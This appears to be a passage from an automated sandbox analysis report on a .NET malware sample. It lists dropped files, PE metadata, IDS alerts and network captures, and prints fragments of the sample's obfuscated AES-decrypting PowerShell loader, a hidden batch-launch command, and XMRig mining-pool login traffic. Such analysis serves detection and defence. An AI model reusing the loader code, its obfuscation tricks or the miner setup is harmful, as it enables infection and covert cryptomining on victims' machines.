                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_oasp21lx.dqg.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_oaupqm0t.g4b.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_rczghabx.seu.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_zuy4kfho.qgw.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                        Entropy (8bit):4.296102734866757
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:X41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs++wmBMZJh1Vj1:I1/YCW2AoQ0NiUwwMHrVJ
                                                                                                                                                        MD5:013BFCFF83ABF4488741CF5A563A6C43
                                                                                                                                                        SHA1:B71D330CF23807CA7C1781498FFA62BD91C800E3
                                                                                                                                                        SHA-256:DDBB4913D90FF98E84FC722030DA5AD886B286D3D6349D807CB3791D1EB0CCC4
                                                                                                                                                        SHA-512:4D36C9CB4C8350B157F4DA1127B02C15B93D5A4ADE506B62C1F6025E68DD8ECA431B64458612718FD3C538A5F39A99E72F038B686D615B904F6CD412CD023682
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~X...................................................................................................................................................................................................................................................................................................................................................K.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        \Device\ConDrv

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):85
                                                                                                                                                        Entropy (8bit):4.84935141926561
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
                                                                                                                                                        MD5:D8C4F9FD5B972AE487170EA993933179
                                                                                                                                                        SHA1:32E61F1DD8A462CEDC6B7A636275363B011ABDA9
                                                                                                                                                        SHA-256:728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
                                                                                                                                                        SHA-512:1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..

                                                                                                                                                        \Device\Null

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with very long lines (2691), with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2838
                                                                                                                                                        Entropy (8bit):5.280168505226083
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:9JFHDRFZRORgRxUB3zFB3OqjwVba3dJX5NvN595f8bLboJ11ccCr6hy771WgH58W:PFHDRFZQ+7UBxBe1sTrN595f8b13Ohk3
                                                                                                                                                        MD5:43AB5228690A7AFA8EBC1ED3CF2D2D7A
                                                                                                                                                        SHA1:F885668648D8CC6FB0C4A8BBFC7F94A50AA2354F
                                                                                                                                                        SHA-256:D735A8F9913CDDD07D2D52338DA9A4E0F157027F915F489A7FB4511FADBE613D
                                                                                                                                                        SHA-512:A0077DA962398F256A50386182CC6B63C2DF4BAFA6F97AB8D256AC7B42D18959EE0D698D8FFEA1F9E63E55ACAD0FA8285BE8C0C09B9A4FDAF620BF6F261DE4AA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function elgju($CRcTF){.$KmeGB=[System.Security.Cryptography.Aes]::Create();.$KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo=');.$KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg==');.$TgPAd=$KmeGB.CreateDecryptor();.$dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length);.$TgPAd.Dispose();.$KmeGB.Dispose();.$dQIvJ;}function VIxdo($CRcTF){.Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', '');.Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblck

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Entropy (8bit):7.999932275677794
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                        File name:e7WMhx18XN.exe
                                                                                                                                                        File size:8'201'216 bytes
                                                                                                                                                        MD5:38be83afea1e906c05e5b851253cbc6a
                                                                                                                                                        SHA1:85841044836479ac3c0b9fb7f1f28928621a4a99
                                                                                                                                                        SHA256:425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3
                                                                                                                                                        SHA512:17334120d971f389db66d529e76f4385948723868bbaeb3dda45ef0988167f11288fdf65d976179889f13bbea128dd9b768e515a91f18ad2812770020d9b68f7
                                                                                                                                                        SSDEEP:196608:UB4i/VIa9g50YQjhHTbq7kGFco1JMdMZoWtz+oeT4wBYR5+Pmk+uy:U6aK6ZSFco1JtZDt+b4F5Hk+u
                                                                                                                                                        TLSH:428633CDF51CA85DC5AB133B2809A69E8449C06F8DF2BF3F9E11EE815E1A43631B1176
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................}..........9}.. ...@}...@.. ........................}...........@................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:90cececece8e8eb0

                                                                                                                                                        Static PE Info

                                                                                                                                                        General

                                                                                                                                                        Entrypoint:0xbd39ee
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x66F895A5 [Sat Sep 28 23:47:49 2024 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:4
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:4
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                        Entrypoint Preview

                                                                                                                                                        Instruction
                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                        Data Directories

                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x7d39980x53.text
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x7d40000x570.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7d60000xc.reloc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                        Sections

                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        .text0x20000x7d19f40x7d1a00428bd0ee91de78e21a1f2ffcd957c968unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rsrc0x7d40000x5700x600a40bbed305a64d921058d4f6948b1727False0.4036458333333333data4.233104836055197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .reloc0x7d60000xc0x200cf13733b140bdaa0d1cb70d61ac086c2False0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "}"0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                        Resources

                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                        RT_VERSION0x7d40a00x22cdata0.4676258992805755
                                                                                                                                                        RT_MANIFEST0x7d42cc0x2a0XML 1.0 document, ASCII text0.4732142857142857

                                                                                                                                                        Imports

                                                                                                                                                        DLLImport
                                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                                        Network Behavior

                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                        2024-10-08T00:23:47.629655+02002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.105446445.76.89.7080TCP
                                                                                                                                                        2024-10-08T00:24:19.090576+02002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.10584551.1.1.153UDP

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Oct 8, 2024 00:24:19.121717930 CEST5446480192.168.2.1045.76.89.70
                                                                                                                                                        Oct 8, 2024 00:24:19.126676083 CEST805446445.76.89.70192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:24:19.126749992 CEST5446480192.168.2.1045.76.89.70
                                                                                                                                                        Oct 8, 2024 00:24:19.126892090 CEST5446480192.168.2.1045.76.89.70
                                                                                                                                                        Oct 8, 2024 00:24:19.132237911 CEST805446445.76.89.70192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:24:19.757189989 CEST805446445.76.89.70192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:24:19.819319963 CEST5446480192.168.2.1045.76.89.70
                                                                                                                                                        Oct 8, 2024 00:24:36.999492884 CEST805446445.76.89.70192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:24:37.204818964 CEST5446480192.168.2.1045.76.89.70
                                                                                                                                                        Oct 8, 2024 00:24:56.150437117 CEST5459354872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:24:56.155350924 CEST5487254593147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:24:56.155426979 CEST5459354872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:24:56.164480925 CEST5459354872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:24:56.169677973 CEST5487254593147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:24:58.902158022 CEST805446445.76.89.70192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:24:59.113888025 CEST5446480192.168.2.1045.76.89.70
                                                                                                                                                        Oct 8, 2024 00:25:17.541994095 CEST5487254593147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:25:17.542115927 CEST5459354872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:25:17.711472988 CEST5459354872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:25:17.718621969 CEST5487254593147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:25:21.017878056 CEST805446445.76.89.70192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:25:21.113858938 CEST5446480192.168.2.1045.76.89.70
                                                                                                                                                        Oct 8, 2024 00:25:21.333116055 CEST5459454872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:25:21.340302944 CEST5487254594147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:25:21.340405941 CEST5459454872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:25:21.340703964 CEST5459454872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:25:21.347095013 CEST5487254594147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:25:42.712289095 CEST5487254594147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:25:42.712372065 CEST5459454872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:25:42.712707996 CEST5459454872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:25:42.717478037 CEST5487254594147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:25:43.034385920 CEST805446445.76.89.70192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:25:43.098167896 CEST5446480192.168.2.1045.76.89.70
                                                                                                                                                        Oct 8, 2024 00:25:46.406872034 CEST5459554872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:25:46.412302971 CEST5487254595147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:25:46.415152073 CEST5459554872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:25:46.415502071 CEST5459554872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:25:46.420603037 CEST5487254595147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:26:01.102925062 CEST805446445.76.89.70192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:26:01.301275969 CEST5446480192.168.2.1045.76.89.70
                                                                                                                                                        Oct 8, 2024 00:26:05.033957958 CEST805446445.76.89.70192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:26:05.098114967 CEST5446480192.168.2.1045.76.89.70
                                                                                                                                                        Oct 8, 2024 00:26:07.765381098 CEST5487254595147.185.221.22192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:26:07.765455008 CEST5459554872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:26:07.765750885 CEST5459554872192.168.2.10147.185.221.22
                                                                                                                                                        Oct 8, 2024 00:26:07.772741079 CEST5487254595147.185.221.22192.168.2.10

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Oct 8, 2024 00:24:12.417530060 CEST53560661.1.1.1192.168.2.10
                                                                                                                                                        Oct 8, 2024 00:24:19.090575933 CEST5845553192.168.2.101.1.1.1
                                                                                                                                                        Oct 8, 2024 00:24:19.119468927 CEST53584551.1.1.1192.168.2.10

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Oct 8, 2024 00:24:19.090575933 CEST192.168.2.101.1.1.10xfedfStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Oct 8, 2024 00:24:19.119468927 CEST1.1.1.1192.168.2.100xfedfNo error (0)pool.hashvault.pro45.76.89.70A (IP address)IN (0x0001)false
                                                                                                                                                        Oct 8, 2024 00:24:19.119468927 CEST1.1.1.1192.168.2.100xfedfNo error (0)pool.hashvault.pro95.179.241.203A (IP address)IN (0x0001)false

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.105446445.76.89.70801528C:\Windows\explorer.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Oct 8, 2024 00:24:19.126892090 CEST568OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 36 52 4e 78 53 53 45 71 63 50 75 76 34 68 77 45 48 6b 4a 66
                                                                                                                                                        Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx","pass":"","agent":"XMRig/6.15.2 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2019",
                                                                                                                                                        Oct 8, 2024 00:24:19.757189989 CEST731INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 31 36 35 63 35 64 66 64 2d 65 36 65 66 2d 34 30 37 37 2d 61 39 38 64 2d 66 35 33 38 36
                                                                                                                                                        Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"165c5dfd-e6ef-4077-a98d-f53862eaa2c0","job":{"blob":"10108ebf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b34000000006027b845aa1072d246ee9ea6d567f5c049012afbb137ccad7ee
                                                                                                                                                        Oct 8, 2024 00:24:36.999492884 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 34 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
                                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a4bf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b340000000002ee761ae05b0ee6a9e5b0f08fbed30e95554c9f96771e6091634b5f65d5c11e48","job_id":"820cb92a-d0c0-4101-ab5e-52084
                                                                                                                                                        Oct 8, 2024 00:24:58.902158022 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 61 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
                                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010babf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b3400000000b964c9dcd0577437cbd730b0e4dcb03053b9eebfd3878202b9c67bd51e01ed564c","job_id":"3f12f74c-36d7-4762-a400-4d245
